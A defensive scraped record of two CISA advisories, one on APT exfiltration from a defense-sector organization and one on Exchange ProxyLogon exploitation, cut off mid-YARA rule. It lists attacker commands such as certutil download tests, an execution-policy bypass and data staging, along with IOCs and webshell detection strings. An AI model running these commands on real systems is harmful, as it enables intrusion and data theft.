(CyWatch) via (855) 292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>).\n * For DIB incident reporting, contact the Defense Cyber Crime Center (DC3) via DIBNET at [dibnet.dod.mil/portal/intranet](<https://dibnet.dod.mil/portal/intranet>) or (410) 981 0104.\n * Reset all login accounts. Reset all accounts used for authentication since it is possible that the threat actors have additional stolen credentials. Password resets should also include accounts outside of Microsoft Active Directory, such as network infrastructure devices and other non-domain joined devices (e.g., IoT devices).\n * Monitor SIEM logs and build detections. Create signatures based on the threat actor TTPs and use these signatures to monitor security logs for any signs of threat actor re-entry.\n * Enforce MFA on all user accounts. Enforce phishing-resistant MFA on all accounts without exception to the greatest extent possible.\n * Follow Microsoft\u2019s security guidance for Active Directory\u2014[Best Practices for Securing Active Directory](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory>).\n * Audit accounts and permissions. Audit all accounts to ensure all unused accounts are disabled or removed and active accounts do not have excessive privileges. Monitor SIEM logs for any changes to accounts, such as permission changes or enabling a previously disabled account, as this might indicate a threat actor using these accounts.\n * Harden and monitor PowerShell by reviewing guidance in the joint Cybersecurity Information Sheet\u2014[Keeping PowerShell: Security Measures to Use and Embrace](<https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/1/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF>).\n\n### Mitigations\n\nMitigation recommendations are usually longer-term efforts that take place before a compromise as part of risk management efforts, or after the threat actors have been evicted from the environment and the immediate response actions are complete. While some may be tailored to the TTPs used by the threat actor, recovery recommendations are largely general best practices and industry standards aimed at bolstering overall cybersecurity posture.\n\n### Segment Networks Based on Function\n\n * **Implement network segmentation to separate network segments based on role and functionality**. Proper network segmentation significantly reduces the ability for ransomware and other threat actor lateral movement by controlling traffic flows between\u2014and access to\u2014various subnetworks. (See CISA\u2019s Infographic on Layering Network Security Through Segmentation and NSA\u2019s [Segment Networks and Deploy Application-Aware Defenses](<https://media.defense.gov/2019/Sep/09/2002180325/-1/-1/0/Segment%20Networks%20and%20Deploy%20Application%20Aware%20Defenses%20-%20Copy.pdf>).)\n * **Isolate similar systems and implement micro-segmentation with granular access and policy restrictions** to modernize cybersecurity and adopt Zero Trust (ZT) principles for both network perimeter and internal devices. Logical and physical segmentation are critical to limiting and preventing lateral movement, privilege escalation, and exfiltration.\n\n### Manage Vulnerabilities and Configurations\n\n * **Update software**, **including operating systems**, **applications**, **and firmware**, **on network assets**. Prioritize patching [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) and critical and high vulnerabilities that allow for remote code execution or denial-of-service on internet-facing equipment.\n * **Implement a configuration change control process** that securely creates device configuration backups to detect unauthorized modifications. When a configuration change is needed, document the change, and include the authorization, purpose, and mission justification. Periodically verify that modifications have not been applied by comparing current device configurations with the most recent backups. If suspicious changes are observed, verify the change was authorized.\n\n### Search for Anomalous Behavior\n\n * **Use cybersecurity visibility and analytics tools** to improve detection of anomalous behavior and enable dynamic changes to policy and other response actions. Visibility tools include network monitoring tools and host-based logs and monitoring tools, such as an endpoint detection and response (EDR) tool. EDR tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.\n * **Monitor the use of scripting languages** (e.g., Python, Powershell) by authorized and unauthorized users. Anomalous use by either group may be indicative of malicious activity, intentional or otherwise.\n\n### Restrict and Secure Use of Remote Admin Tools\n\n * **Limit the number of remote access tools as well as who and what can be accessed using them**. Reducing the number of remote admin tools and their allowed access will increase visibility of unauthorized use of these tools.\n * **Use encrypted services to protect network communications and disable all clear text administration services**(e.g., Telnet, HTTP, FTP, SNMP 1/2c). This ensures that sensitive information cannot be easily obtained by a threat actor capturing network traffic.\n\n### Implement a Mandatory Access Control Model\n\n * **Implement stringent access controls to sensitive data and resources**. Access should be restricted to those users who require access and to the minimal level of access needed.\n\n### Audit Account Usage\n\n * **Monitor VPN logins to look for suspicious access** (e.g., logins from unusual geo locations, remote logins from accounts not normally used for remote access, concurrent logins for the same account from different locations, unusual times of the day).\n * **Closely monitor the use of administrative accounts**. Admin accounts should be used sparingly and only when necessary, such as installing new software or patches. Any use of admin accounts should be reviewed to determine if the activity is legitimate.\n * **Ensure standard user accounts do not have elevated privileges** Any attempt to increase permissions on standard user accounts should be investigated as a potential compromise.\n\n### VALIDATE SECURITY CONTROLS\n\nIn addition to applying mitigations, CISA, FBI, and NSA recommend exercising, testing, and validating your organization's security program against threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA, FBI, and NSA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.\n\nTo get started:\n\n 1. Select an ATT&CK technique described in this advisory (see Table 1).\n 2. Align your security technologies against the technique.\n 3. Test your technologies against the technique.\n 4. Analyze the performance of your detection and prevention technologies.\n 5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.\n 6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.\n\nCISA, FBI, and NSA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.\n\n### RESOURCES\n\nCISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See [cisa.gov/cyber-hygiene-services](<https://www.cisa.gov/cyber-hygiene-services>).\n\nU.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center\u2019s DIB Cybersecurity Service Offerings, including Protective Domain Name System (PDNS) services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email [dib_defense@cyber.nsa.gov](<mailto:dib_defense@cyber.nsa.gov>).\n\n### ACKNOWLEDGEMENTS\n\nCISA, FBI, and NSA acknowledge Mandiant for its contributions to this CSA.\n\n### APPENDIX: WINDOWS COMMAND SHELL ACTIVITY\n\nOver a three-day period in February 2021, APT cyber actors used Windows Command Shell to interact with the victim\u2019s environment. When interacting with the victim\u2019s system and executing commands, the threat actors used /q and /c parameters to turn the echo off, carry out the command specified by a string, and stop its execution once completed.\n\nOn the first day, the threat actors consecutively executed many commands within the Windows Command Shell to learn about the organization\u2019s environment and to collect sensitive data for eventual exfiltration (see Table 2).\n\n_Table 2: Windows Command Shell Activity (Day 1)_\n\nCommand\n\n| \n\nDescription / Use \n \n---|--- \n \nnet share\n\n| \n\nUsed to create, configure, and delete network shares from the command-line.[[1](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh750728\\(v=ws.11\\)>)] The threat actor likely used this command to display information about shared resources on the local computer and decide which directories to exploit. \n \npowershell dir\n\n| \n\nAn alias (shorthand) for the PowerShell Get-ChildItem cmdlet. This command maps shared drives by specifying a path to one location and retrieving the items from another.[[2](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.2>)] The threat actor added additional switches (aka options, parameters, or flags) to form a \u201cone liner,\u201d an expression to describe commonly used commands used in exploitation: powershell dir -recurse -path e:\\<redacted>|select fullname,length|export-csv c:\\windows\\temp\\temp.txt. This particular command lists subdirectories of the target environment when. \n \nsysteminfo\n\n| \n\nDisplays detailed configuration information [[3](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo>)], tasklist \u2013 lists currently running processes [[4](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)], and ipconfig \u2013 displays all current Transmission Control Protocol (TCP)/IP network configuration values and refreshes Dynamic Host Configuration Protocol (DHCP) and Domain Name System (DNS) settings, respectively [[5](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig>)]. The threat actor used these commands with specific switches to determine if the system was a VMware virtual machine: systeminfo > vmware & date /T, tasklist /v > vmware & date /T, and ipconfig /all >> vmware & date /. \n \nroute print\n\n| \n\nUsed to display and modify the entries in the local IP routing table. [[6](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961510\\(v=ws.11\\)>)] The threat actor used this command to display the entries in the local IP routing table. \n \nnetstat\n\n| \n\nUsed to display active TCP connections, ports on which the computer is listening, Ethernet statistics, the IP routing table, IPv4 statistics, and IPv6 statistics.[[7](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat>)] The threat actor used this command with three switches to display TCP connections, prevent hostname determination of foreign IP addresses, and specify the protocol for TCP: netstat -anp tcp. \n \ncertutil\n\n| \n\nUsed to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.[[8](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil>)] The threat actor used this command with three switches to test if they could download files from the internet: certutil -urlcache -split -f https://microsoft.com temp.html. \n \nping\n\n| \n\nSends Internet Control Message Protocol (ICMP) echoes to verify connectivity to another TCP/IP computer.[[9](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)] The threat actor used ping -n 2 apple.com to either test their internet connection or to detect and avoid virtualization and analysis environments or network restrictions. \n \ntaskkill\n\n| \n\nUsed to end tasks or processes.[[10](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill>)] The threat actor used taskkill /F /PID 8952 to probably disable security features. CISA was unable to determine what this process was as the process identifier (PID) numbers are dynamic. \n \nPowerShell Compress-Archive cmdlet\n\n| \n\nUsed to create a compressed archive or to zip files from specified files and directories.[[11](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.archive/compress-archive?view=powershell-7.2>)] The threat actor used parameters indicating shared drives as file and folder sources and the destination archive as zipped files. Specifically, they collected sensitive contract-related information from the shared drives. \n \nOn the second day, the APT cyber actors executed the commands in Table 3 to perform discovery as well as collect and archive data.\n\n_Table 3: Windows Command Shell Activity (Day 2)_\n\nCommand\n\n| \n\nDescription / Use \n \n---|--- \n \nntfsinfo.exe\n\n| \n\nUsed to obtain volume information from the New Technology File System (NTFS) and to print it along with a directory dump of NTFS meta-data files.[[12](<https://docs.microsoft.com/en-us/sysinternals/downloads/ntfsinfo>)] \n \nWinRAR.exe\n\n| \n\nUsed to compress files and subsequently masqueraded WinRAR.exe by renaming it VMware.exe.[[13](<https://www.rarlab.com/>)] \n \nOn the third day, the APT cyber actors returned to the organization\u2019s network and executed the commands in Table 4.\n\n_Table 4: Windows Command Shell Activity (Day 3)_\n\nCommand\n\n| \n\nDescription / Use \n \n---|--- \n \npowershell -ep bypass import-module .\\vmware.ps1;export-mft -volume e\n\n| \n\nThreat actors ran a PowerShell command with parameters to change the execution mode and bypass the Execution Policy to run the script from PowerShell and add a module to the current section: powershell -ep bypass import-module .\\vmware.ps1;export-mft -volume e. This module appears to acquire and export the Master File Table (MFT) for volume E for further analysis by the cyber actor.[[14](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2>)] \n \nset.exe\n\n| \n\nUsed to display the current environment variable settings.[[15](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/set_1>)] (An environment variable is a dynamic value pointing to system or user environments (folders) of the system. System environment variables are defined by the system and used globally by all users, while user environment variables are only used by the user who declared that variable and they override the system environment variables (even if the variables are named the same). \n \ndir.exe\n\n| \n\nUsed to display a list of a directory's files and subdirectories matching the eagx* text string, likely to confirm the existence of such file. \n \ntasklist.exe and find.exe\n\n| \n\nUsed to display a list of applications and services with their PIDs for all tasks running on the computer matching the string \u201cpowers\u201d.[[16](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)][[17](<https://attack.mitre.org/software/S0057/>)][[18](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/find>)] \n \nping.exe\n\n| \n\nUsed to send two ICMP echos to amazon.com. This could have been to detect or avoid virtualization and analysis environments, circumvent network restrictions, or test their internet connection.[[19](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)] \n \ndel.exe with the /f parameter\n\n| \n\nUsed to force the deletion of read-only files with the *.rar and tempg* wildcards.[[20](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/del>)] \n \n### References\n\n[[1] Microsoft Net Share](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/hh750728\\(v=ws.11\\)>)\n\n[[2] Microsoft Get-ChildItem](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-childitem?view=powershell-7.2>)\n\n[[3] Microsoft systeminfo](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo>)\n\n[[4] Microsoft tasklist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)\n\n[[5] Microsoft ipconfig](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ipconfig>)\n\n[[6] Microsoft Route](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961510\\(v=ws.11\\)>)\n\n[[7] Microsoft netstat](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat>)\n\n[ [8] Microsoft certutil](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil>)\n\n[[9] Microsoft ping](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)\n\n[[10] Microsoft taskkill](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill>)\n\n[[11] Microsoft Compress-Archive](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.archive/compress-archive?view=powershell-7.2>)\n\n[[12] NTFSInfo v1.2](<https://docs.microsoft.com/en-us/sysinternals/downloads/ntfsinfo>)\n\n[[13] rarlab](<https://www.rarlab.com/>)\n\n[[14] Microsoft Import-Module](<https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/import-module?view=powershell-7.2>)\n\n[[15] Microsoft set (environment variable)](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/set_1>)\n\n[[16] Microsoft tasklist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist>)\n\n[[17] Mitre ATT&CK - Sofware: TaskList](<https://attack.mitre.org/versions/v11/software/S0057/>)\n\n[[18] Microsoft find](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/find>)\n\n[[19] Microsoft ping](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ping>)\n\n[[20] Microsoft del](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/del>)\n\n### Revisions\n\nOctober 4, 2022: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-05T12:00:00", "type": "ics", "title": "Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2022-10-05T12:00:00", "id": "AA22-277A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-277a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-10T01:24:12", "description": "### Summary\n\n_Updated July 19, 2021: The U.S. Government attributes this activity to malicious cyber actors affiliated with the People's Republic of China (PRC) Ministry of State Security (MSS). Additional information may be found in a [statement from the White House](<https://www.whitehouse.gov/briefing-room/statements-releases/2021/07/19/the-united-states-joined-by-allies-and-partners-attributes-malicious-cyber-activity-and-irresponsible-state-behavior-to-the-peoples-republic-of-china/>). For more information on Chinese malicious cyber activity, refer to [us-cert.cisa.gov/China](<https://us-cert.cisa.gov/china>)._\n\n_**Note:** This Alert was updated April 13, 2021, to provide further guidance. _\n\nCybersecurity and Infrastructure Security Agency (CISA) partners have observed active exploitation of vulnerabilities in Microsoft Exchange Server products. Successful exploitation of these vulnerabilities allows an unauthenticated attacker to execute arbitrary code on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system. Successful exploitation may additionally enable the attacker to compromise trust and identity in a vulnerable network. Microsoft released out-of-band patches to address vulnerabilities in Microsoft Exchange Server. The vulnerabilities impact on-premises Microsoft Exchange Servers and are not known to impact Exchange Online or Microsoft 365 (formerly O365) cloud email services.\n\nThis Alert includes both tactics, techniques and procedures (TTPs) and the indicators of compromise (IOCs) associated with this malicious activity. To secure against this threat, CISA recommends organizations examine their systems for the TTPs and use the IOCs to detect any malicious activity. If an organization discovers exploitation activity, they should assume network identity compromise and follow incident response procedures. If an organization finds no activity, they should apply available patches immediately and implement the mitigations in this Alert.\n\nClick here for IOCs in STIX format.\n\n### Technical Details\n\n_(Updated April 14, 2021)_: [Microsoft's April 2021 Security Update](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Apr>) newly discloses and mitigates significant vulnerabilities affecting on-premises Exchange Server 2013, 2016, and 2019.\n\nMicrosoft has released out-of-band security updates to address four vulnerabilities in Exchange Server:\n\n * [CVE-2021-26855](<https://vulners.com/cve/CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://vulners.com/cve/CVE-2021-26857>), [CVE-2021-26858](<https://vulners.com/cve/CVE-2021-26858>), and [CVE-2021-27065](<https://vulners.com/cve/CVE-2021-27065>) allow for remote code execution. \n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server.\n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as `SYSTEM `on the Exchange Server.\n\n * To locate a possible compromise of these CVEs, CISA encourages organizations read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\nIt is possible for an attacker, once authenticated to the Exchange server, to gain access to the Active Directory environment and download the Active Directory Database.\n\n_(Updated March 12, 2021):_ Microsoft Security Intelligence has released a [tweet](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) on [DearCry](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/>) ransomware being used to exploit compromised on-premises Exchange Servers. Ransomware infections can have negative consequences to an affected organization, including:\n\n * temporary or permanent loss of sensitive or proprietary information,\n * disruption to regular operations,\n * financial losses incurred to restore systems and files, and\n * potential harm to an organization\u2019s reputation.\n\n(_Updated April 12, 2021_): CISA recommends organizations review Malware Analysis Report (MAR) [MAR-10330097-1.v1 \u2013 DearCry Ransomware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102b>) for detailed analysis, along with TTPs and IOCs.\n\n_(Updated March 12, 2021): _CISA encourages organizations to review CISA\u2019s [Ransomware web page](<https://www.cisa.gov/ransomware>) for guidance and resources. Victims of ransomware should report it immediately to CISA at [www.us-cert.gov/report](<https://www.us-cert.gov/report>), a local[ FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or [Secret Service Field Office](<http://www.secretservice.gov/contact/field-offices/>).\n\n### Tactics, Techniques and Procedures\n\n_(Updated March 10, 2021):_ Microsoft has released a script that scans Exchange log files for IOCs. CISA strongly encourages organizations to run the [Test-ProxyLogon.ps1 script](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>)\u2014as soon as possible\u2014to help determine whether their systems are compromised.\n\n_(Updated March 16, 2021): _**Note:** Microsoft has released the [Exchange On-premises Mitigation Tool (EOMT.ps1)](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) that can automate portions of both the detection and patching process. Microsoft stated the following along with the release: \"[the tool is intended] to help customers who do not have dedicated security or IT teams to apply these security updates. We have tested this tool across Exchange Server 2013, 2016, and 2019 deployments. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\u201d Review the [EOMT.ps1 blog post](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>) for directions on using the tool.\n\n_(Updated March 10, 2021):_ CISA recommends investigating for signs of a compromise from at least January 1, 2021 through present.\n\n_(Updated April 12, 2021): _CISA has identified 10 webshells associated with this activity. This is not an all-inclusive list of webshells that are being leveraged by actors. CISA recommends organizations review the following MARs for detailed analysis of the 10 webshells, along with TTPs and IOCs. These MARs include CISA-developed YARA rules to help network defenders detect associated malware.\n\n 1. AR21-072A: [MAR-10328877.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072a>)\n 2. AR21-072B: [MAR-10328923.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072b>)\n 3. AR21-072C: [MAR-10329107.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072c>)\n 4. AR21-072D: [MAR-10329297.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072d>)\n 5. AR21-072E: [MAR-10329298.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072e>)\n 6. AR21-072F: [MAR-10329301.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072f>)\n 7. AR21-072G: [MAR-10329494.r1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-072g>)\n 8. AR21-084A: [MAR-10329496-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-084a>)\n 9. AR21-084B: [MAR-10329499-1.v1: China Chopper Webshell ](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-084b>)\n 10. AR21-102A: [MAR-10331466-1.v1: China Chopper Webshell](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-102a>)\n\n_(Updated March 13, 2021):_ A webshell is a script that can be uploaded to a compromised Microsoft Exchange Server to enable remote administration of the machine. Webshells are utilized for the following purposes:\n\n * To harvest and exfiltrate sensitive data and credentials;\n * To upload additional malware for the potential of creating, for example, a watering hole for infection and scanning of further victims;\n * To use as a relay point to issue commands to hosts inside the network without direct internet access;\n * To use as command-and-control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks. This could occur if the adversary intends to maintain long-term persistence.\n\n_(Updated March 13, 2021): _For more information, see [TA15-314A Compromised Web Servers and Web Shells - Threat Awareness and Guidance](<https://us-cert.cisa.gov/ncas/alerts/TA15-314A>).\n\nThe majority of the TTPs in this section are sourced from a [blog post from Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>), a third-party cybersecurity firm. **Note: **the United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.\n\nVolexity has observed the following files as targets of `HTTP POST` requests:\n\n * `/owa/auth/Current/themes/resources/logon.css`\n * `/owa/auth/Current/themes/resources/owafont_ja.css`\n * `/owa/auth/Current/themes/resources/lgnbotl.gif`\n * `/owa/auth/Current/themes/resources/owafont_ko.css`\n * `/owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot`\n * `/owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf`\n * `/owa/auth/Current/themes/resources/lgnbotl.gif`\n\nAdministrators should search the ECP server logs for the following string (or something similar):\n\n`S:CMD=Set-OabVirtualDirectory.ExternalUrl='`\n\nThe logs can be found at `<exchange install path>\\Logging\\ECP\\Server\\`.\n\nTo determine possible webshell activity, administrators should search for `aspx` files in the following paths:\n\n * `\\inetpub\\wwwroot\\aspnet_client\\ `(any `.aspx` file under this folder or sub folders)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\ecp\\auth\\ `(any file besides `TimeoutLogoff.aspx`)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\ `(any file or modified file that is not part of a standard install)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\ `(any `aspx `file in this folder or subfolders)\n * `\\<exchange install path>\\FrontEnd\\HttpProxy\\owa\\auth\\<folder with version number>\\ `(any `aspx `file in this folder or subfolders)\n\nAdministrators should search in the `/owa/auth/Current` directory for the following non-standard web log user-agents. These agents may be useful for incident responders to look at to determine if further investigation is necessary.\n\nThese should not be taken as definitive IOCs:\n\n * `DuckDuckBot/1.0;+(+http://duckduckgo.com/duckduckbot.html)`\n * `facebookexternalhit/1.1+(+http://www.facebook.com/externalhit_uatext.php)`\n * `Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)`\n * `Mozilla/5.0+(compatible;+Bingbot/2.0;++http://www.bing.com/bingbot.htm)`\n * `Mozilla/5.0+(compatible;+Googlebot/2.1;++http://www.google.com/bot.html`\n * `Mozilla/5.0+(compatible;+Konqueror/3.5;+Linux)+KHTML/3.5.5+(like+Gecko)+(Exabot-Thumbnails)`\n * `Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp)`\n * `Mozilla/5.0+(compatible;+YandexBot/3.0;++http://yandex.com/bots)`\n * `Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36`\n\nVolexity observed these user-agents in conjunction with exploitation to `/ecp/ `URLs:\n\n * `ExchangeServicesClient/0.0.0.0`\n * `python-requests/2.19.1`\n * `python-requests/2.25.1`\n\nThese user-agents were also observed having connections to post-exploitation web-shell access:\n\n * `antSword/v2.1`\n * `Googlebot/2.1+(+http://www.googlebot.com/bot.html)`\n * `Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)`\n\nAs with the non-standard user-agents, responders can examine internet information services (IIS) logs from Exchange Servers to identify possible historical activity. Also, as with the non-standard user agents, these should not be taken as definitive IOCs:\n\n * `POST /owa/auth/Current/`\n * `POST /ecp/default.flt`\n * `POST /ecp/main.css`\n * `POST /ecp/<single char>.js`\n\nVolexity has seen attackers leverage the following IP addresses. Although these are tied to virtual private servers (VPSs) servers and virtual private networks (VPNs), responders should investigate these IP addresses on their networks and act accordingly:\n\n * `103.77.192[.]219`\n * `104.140.114[.]110`\n * `104.250.191[.]110`\n * `108.61.246[.]56`\n * `149.28.14[.]163`\n * `157.230.221[.]198`\n * `167.99.168[.]251`\n * `185.250.151[.]72`\n * `192.81.208[.]169`\n * `203.160.69[.]66`\n * `211.56.98[.]146`\n * `5.254.43[.]18`\n * `5.2.69[.]14`\n * `80.92.205[.]81`\n * `91.192.103[.]43`\n\nVolexity has also provided the following YARA signatures that can be run within your network to assist in finding signs of a compromise.\n\nrule webshell_aspx_simpleseesharp : Webshell Unclassified \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"A simple ASPX Webshell that allows an attacker to write further files to disk.\" \nhash = \"893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2\" \n \nstrings: \n$header = \"<%@ Page Language=\\\"C#\\\" %>\" \n$body = \"<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine\" \n \ncondition: \n$header at 0 and \n$body and \nfilesize < 1KB \n} \n \nrule webshell_aspx_reGeorgTunnel : Webshell Commodity \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"A variation on the reGeorg tunnel webshell\" \nhash = \"406b680edc9a1bb0e2c7c451c56904857848b5f15570401450b73b232ff38928\" \nreference = \"https://github.com/sensepost/reGeorg/blob/master/tunnel.aspx\" \n \nstrings: \n$s1 = \"System.Net.Sockets\" \n$s2 = \"System.Text.Encoding.Default.GetString(Convert.FromBase64String(StrTr(Request.Headers.Get\" \n// a bit more experimental \n$t1 = \".Split(\u2018|\u2019)\" \n$t2 = \"Request.Headers.Get\" \n$t3 = \".Substring(\" \n$t4 = \"new Socket(\" \n$t5 = \"IPAddress ip;\" \n \ncondition: \nall of ($s*) or \nall of ($t*) \n} \n \nrule webshell_aspx_sportsball : Webshell Unclassified \n{ \nmeta: \nauthor = \"threatintel@volexity.com\" \ndate = \"2021-03-01\" \ndescription = \"The SPORTSBALL webshell allows attackers to upload files or execute commands on the system.\" \nhash = \"2fa06333188795110bba14a482020699a96f76fb1ceb80cbfa2df9d3008b5b0a\" \n \nstrings: \n$uniq1 = \"HttpCookie newcook = new HttpCookie(\\\"fqrspt\\\", HttpContext.Current.Request.Form\" \n$uniq2 = \"ZN2aDAB4rXsszEvCLrzgcvQ4oi5J1TuiRULlQbYwldE=\" \n \n$var1 = \"Result.InnerText = 